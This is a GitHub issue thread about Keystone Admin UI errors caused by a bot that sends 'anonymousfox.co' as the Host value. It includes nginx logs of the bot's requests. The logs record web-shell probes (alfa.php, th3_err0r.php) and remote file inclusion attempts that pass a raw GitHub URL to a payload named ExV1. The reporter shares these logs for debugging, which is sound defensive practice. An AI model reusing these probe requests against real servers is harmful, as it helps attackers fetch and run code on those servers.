### ISSUE TITLE
A lot of errors with line "Invalid URL: anonymousfox.co"

### ISSUE THREAD

**Issue by MurzNN** [keystonejs/keystone#7709]
On my publicly available Keystone instance I see a lot of errors in Keystone output like this:
```
An error occurred handling a request for the Admin UI: TypeError [ERR_INVALID_URL]: Invalid URL: anonymousfox.co
    at new NodeError (internal/errors.js:322:7)
    at onParseError (internal/url.js:270:9)
    at new URL (internal/url.js:346:5)
    at Object.isAccessAllowed (/app/.keystone/admin/.next/server/pages/api/__keystone_api_build.js:9196:94)
    at /app/keystone_core/packages/keystone/dist/createAdminUIMiddleware-ccfdeb37.cjs.dev.js:177:92
    at runMicrotasks (<anonymous>)
    at processTicksAndRejections (internal/process/task_queues.js:95:5) {
  input: 'anonymousfox.co',
  code: 'ERR_INVALID_URL'
}
```
Seems there is spammers tries to do some bad things, but will be good to make this error message more informative on Keystone side.

**Comment by MurzNN** [comment]
This error is shown always when someone do the GET query to non-existing url, in nginx logs I've found the relevant records about this:
```
1.2.3.4 - - [11/Jul/2022:18:09:35 +0000] "GET /style.php HTTP/1.1" 308 164 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" 458 0.000 [my-keystone-3000] [] - - - - f990d48d9af6f74a7813518a43a1584e
1.2.3.4 - - [11/Jul/2022:18:09:38 +0000] "GET /style.php HTTP/1.1" 500 1378 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" 458 0.024 [my-keystone-3000] [] 10.233.127.33:3000 1378 0.024 500 f4e427419c78968831dcd94d434cf9bd
1.2.3.4 - - [11/Jul/2022:18:09:43 +0000] "GET /moduless.php HTTP/1.1" 308 164 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" 461 0.000 [my-keystone-3000] [] - - - - 99809a0ffd0630f3ffbfe44cee610f4e
1.2.3.4 - - [11/Jul/2022:18:09:46 +0000] "GET /moduless.php HTTP/1.1" 500 1378 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" 461 0.009 [my-keystone-3000] [] 10.233.127.33:3000 1378 0.009 500 e34fe5e0567ae9b3d6186dd2396908ca
1.2.3.4 - - [11/Jul/2022:18:09:52 +0000] "GET /wp-content/plugins/t_file_wp/t_file_wp.php?test=hello HTTP/1.1" 308 164 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" 502 0.000 [my-keystone-3000] [] - - - - ba3052f28a34653acd9b1b0384b002d5
1.2.3.4 - - [11/Jul/2022:18:09:56 +0000] "GET /wp-content/plugins/t_file_wp/t_file_wp.php?test=hello HTTP/1.1" 500 1378 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" 502 0.010 [my-keystone-3000] [] 10.233.127.33:3000 1378 0.011 500 5633be78972063497c995d5916fa1a5b
1.2.3.4 - - [11/Jul/2022:18:10:00 +0000] "GET /admin.php HTTP/1.1" 308 164 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" 458 0.000 [my-keystone-3000] [] - - - - 099a3ad0a6807635d2c7a29f3bff09bc
1.2.3.4 - - [11/Jul/2022:18:10:03 +0000] "GET /admin.php HTTP/1.1" 500 1378 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" 458 0.007 [my-keystone-3000] [] 10.233.127.33:3000 1378 0.008 500 561fd21e50861a33c0d01cd6cc5d900f
1.2.3.4 - - [11/Jul/2022:18:10:10 +0000] "GET /index.php?3x=3x HTTP/1.1" 308 164 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" 464 0.000 [my-keystone-3000] [] - - - - f087f2150674a5f00122c29cb5e983cc
1.2.3.4 - - [11/Jul/2022:18:10:13 +0000] "GET /index.php?3x=3x HTTP/1.1" 500 1378 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" 464 0.008 [my-keystone-3000] [] 10.233.127.33:3000 1378 0.008 500 48140de8980c77199cca2193d64e8dc3
1.2.3.4 - - [11/Jul/2022:18:10:18 +0000] "GET /boom.php?x HTTP/1.1" 308 164 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" 459 0.000 [my-keystone-3000] [] - - - - 7b5b89507f538ca4d6044ce278b837c0
1.2.3.4 - - [11/Jul/2022:18:10:21 +0000] "GET /boom.php?x HTTP/1.1" 500 1378 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" 459 0.008 [my-keystone-3000] [] 10.233.127.33:3000 1378 0.008 500 50843820f6b344fde14a5e121eebc2cc
1.2.3.4 - - [11/Jul/2022:18:10:26 +0000] "GET /wp-content/plugins/backup_index.php HTTP/1.1" 308 164 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" 484 0.000 [my-keystone-3000] [] - - - - 38951de093ce78e582057228a6ccc580
1.2.3.4 - - [11/Jul/2022:18:10:28 +0000] "GET /wp-content/plugins/backup_index.php HTTP/1.1" 500 1378 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" 484 0.010 [my-keystone-3000] [] 10.233.127.33:3000 1378 0.010 500 262477aaf762d10977a6ac948f720da2
1.2.3.4 - - [11/Jul/2022:18:10:34 +0000] "GET /wp-content/db_cache.php HTTP/1.1" 308 164 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" 472 0.000 [my-keystone-3000] [] - - - - d0800c172a0d7585c2b21847a6a89ca9
1.2.3.4 - - [11/Jul/2022:18:10:36 +0000] "GET /wp-content/db_cache.php HTTP/1.1" 500 1378 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" 472 0.009 [my-keystone-3000] [] 10.233.127.33:3000 1378 0.009 500 1ff452bc7a970fe22e7cfc1760c66640
1.2.3.4 - - [11/Jul/2022:18:10:42 +0000] "GET /wp-content/plugins/ioptimization/IOptimize.php?rchk HTTP/1.1" 308 164 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" 500 0.000 [my-keystone-3000] [] - - - - dd7638aa7ab883daf7d2b1ffaf771b58
1.2.3.4 - - [11/Jul/2022:18:10:45 +0000] "GET /wp-content/plugins/ioptimization/IOptimize.php?rchk HTTP/1.1" 500 1378 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" 500 0.007 [my-keystone-3000] [] 10.233.127.33:3000 1378 0.008 500 e9f251527066ac0862fc1065f73ee9c1
1.2.3.4 - - [11/Jul/2022:18:10:51 +0000] "GET /xmlrp.php?url=https://raw.githubusercontent.com/carlosdechia/carlosdechia/main/ExV1 HTTP/1.1" 308 164 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" 532 0.000 [my-keystone-3000] [] - - - - c73adb8c6a0d19cc0c372c1a07ee0801
1.2.3.4 - - [11/Jul/2022:18:10:55 +0000] "GET /xmlrp.php?url=https://raw.githubusercontent.com/carlosdechia/carlosdechia/main/ExV1 HTTP/1.1" 500 1378 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" 532 0.007 [my-keystone-3000] [] 10.233.127.33:3000 1378 0.007 500 492bd34b70870bb2430b4ac3b7c58ccb
1.2.3.4 - - [11/Jul/2022:18:11:00 +0000] "GET /wpindex.php?idb=https://raw.githubusercontent.com/carlosdechia/carlosdechia/main/ExV1 HTTP/1.1" 308 164 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" 534 0.000 [my-keystone-3000] [] - - - - 893472337b2c3b34dd91d45dc7423a24
1.2.3.4 - - [11/Jul/2022:18:11:03 +0000] "GET /wpindex.php?idb=https://raw.githubusercontent.com/carlosdechia/carlosdechia/main/ExV1 HTTP/1.1" 500 1378 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" 534 0.008 [my-keystone-3000] [] 10.233.127.33:3000 1378 0.008 500 7be6fe316a73ab24b4612efb5ff722c0
1.2.3.4 - - [11/Jul/2022:18:11:09 +0000] "GET /larva.php?idb=https://raw.githubusercontent.com/carlosdechia/carlosdechia/main/ExV1 HTTP/1.1" 308 164 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" 532 0.000 [my-keystone-3000] [] - - - - 4ae82836d8aa1126369c4ee910501bee
1.2.3.4 - - [11/Jul/2022:18:11:13 +0000] "GET /larva.php?idb=https://raw.githubusercontent.com/carlosdechia/carlosdechia/main/ExV1 HTTP/1.1" 500 1378 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" 532 0.008 [my-keystone-3000] [] 10.233.127.33:3000 1378 0.008 500 4b4f30c228689bbbf632a70d04029d05
1.2.3.4 - - [11/Jul/2022:18:11:18 +0000] "GET /th3_err0r.php?php=https://raw.githubusercontent.com/carlosdechia/carlosdechia/main/ExV1 HTTP/1.1" 308 164 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" 536 0.000 [my-keystone-3000] [] - - - - ba26d1eb83ce5ad4b610c4ea5309a1fe
1.2.3.4 - - [11/Jul/2022:18:11:21 +0000] "GET /th3_err0r.php?php=https://raw.githubusercontent.com/carlosdechia/carlosdechia/main/ExV1 HTTP/1.1" 500 1378 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" 536 0.008 [my-keystone-3000] [] 10.233.127.33:3000 1378 0.008 500 e951d94b06efea1430d413e0427f44d7
1.2.3.4 - - [11/Jul/2022:18:11:29 +0000] "GET /alfindex.php HTTP/1.1" 308 164 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" 461 0.000 [my-keystone-3000] [] - - - - 36b78f536ce06c337f530dc707613ec5
1.2.3.4 - - [11/Jul/2022:18:11:32 +0000] "GET /alfindex.php HTTP/1.1" 500 1378 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" 461 0.009 [my-keystone-3000] [] 10.233.127.33:3000 1378 0.009 500 ce49194969f0f13a31fec3fe0a72f909
1.2.3.4 - - [11/Jul/2022:18:11:38 +0000] "GET /alfa.php HTTP/1.1" 308 164 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" 457 0.000 [my-keystone-3000] [] - - - - 50a3179b605f0b8048664114677da729
1.2.3.4 - - [11/Jul/2022:18:11:40 +0000] "GET /alfa.php HTTP/1.1" 500 1378 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" 457 0.011 [my-keystone-3000] [] 10.233.127.33:3000 1378 0.010 500 7c3f2f5f1796dfceb039196358f9ac19
1.2.3.4 - - [11/Jul/2022:18:11:46 +0000] "GET /wp-booking.php HTTP/1.1" 308 164 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" 463 0.000 [my-keystone-3000] [] - - - - 8b9bf6b84803722e12c12dd95b632ba4
```

**Comment by dcousens** [comment]
Cannot reproduce in newest `@keystone-6`, please comment or open a new issue if you can
